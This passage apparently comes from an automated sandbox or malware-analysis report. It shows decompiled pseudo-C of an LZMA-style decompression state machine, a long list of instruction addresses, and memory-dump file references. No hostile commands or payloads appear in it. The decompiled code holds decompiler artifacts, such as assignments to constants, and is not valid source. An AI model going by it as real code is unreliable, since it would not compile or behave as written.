												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
